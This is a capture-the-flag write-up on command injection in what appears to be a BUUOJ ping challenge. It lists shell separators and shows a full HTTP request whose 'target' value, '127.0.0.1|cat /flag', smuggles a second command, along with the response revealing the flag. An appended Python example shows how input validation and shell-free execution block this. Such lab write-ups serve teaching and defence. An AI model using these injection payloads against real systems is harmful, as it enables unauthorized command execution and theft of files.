Key points

Vulnerability                              Key point
Arbitrary command execution vulnerability  Command bypass

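Command injection methods

Command       Method
whoami;id     Multiple statement execution
whoami|id     Uses the pipe operator; the output of the first command is not shown
whoami&&id    Multiple statement execution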

Solution approach

    POST / HTTP/1.1
    Host: e3c2b7d9-2f25-4a03-a142-00cd3760e296.node3.buuoj.cn
    Content-Length: 26
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://e3c2b7d9-2f25-4a03-a142-00cd3760e296.node3.buuoj.cn
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://e3c2b7d9-2f25-4a03-a142-00cd3760e296.node3.buuoj.cn/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Connection: close

    target=127.0.0.1|cat /flag

Response

    HTTP/1.1 200 OK
    Server: openresty
    Date: Thu, 17 Sep 2020 12:33:40 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 666
    Connection: close
    X-Powered-By: PHP/7.3.13

    .......
    flag{7b042344-6fec-4f7d-a3f5-c43c4c252dd2}
    .......
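
An added example, not part of the original write-up and not the challenge's server code: it shows why the `target` value in the request above becomes two commands once it is concatenated into a shell string, and how accepting only an IP literal and executing an argument list without a shell rejects every separator from the table. The `ping -c 3` command and all function names are assumptions, since the page does not show the handler.

```python
from __future__ import annotations
import ipaddress
import shlex
import subprocess

OPERATORS = {";", "|", "&&"}  # the separators listed in the table above

def shell_view(command: str) -> list[list[str]]:
    """Split a shell string into the separate commands a shell would run."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in OPERATORS:
            commands.append(current)
            current = []
        else:
            current.append(token)
    commands.append(current)
    return commands

def vulnerable_command(target: str) -> str:
    # Assumed handler pattern: user input concatenated into a shell string.
    return "ping -c 3 " + target

def safe_argv(target: str) -> list[str]:
    """Accept only an IP literal; return argv for execution without a shell."""
    addr = ipaddress.ip_address(target)  # raises ValueError for anything else
    return ["ping", "-c", "3", str(addr)]

def run_ping(target: str) -> subprocess.CompletedProcess:
    # A list argv with the default shell=False: metacharacters are never interpreted.
    return subprocess.run(safe_argv(target), capture_output=True, text=True, timeout=10)

if __name__ == "__main__":
    payload = "127.0.0.1|cat /flag"  # body value from the request on this page
    print(shell_view(vulnerable_command(payload)))
    try:
        safe_argv(payload)
    except ValueError as err:
        print("rejected:", err)
```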